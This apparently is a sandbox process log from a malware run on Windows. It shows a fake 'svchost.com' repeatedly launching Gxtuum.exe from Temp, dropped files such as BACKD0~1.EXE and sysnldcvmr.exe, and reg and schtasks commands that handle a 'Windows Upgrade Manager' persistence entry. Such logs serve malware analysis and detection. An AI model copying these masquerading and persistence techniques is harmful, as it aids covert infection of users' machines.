C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\2578412766.exe

C:\Users\Admin\AppData\Local\Temp\2578412766.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE

C:\Users\Admin\sysnldcvmr.exe

C:\Users\Admin\sysnldcvmr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\513022960.exe

C:\Users\Admin\AppData\Local\Temp\513022960.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Windows\SysWOW64\reg.exe

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

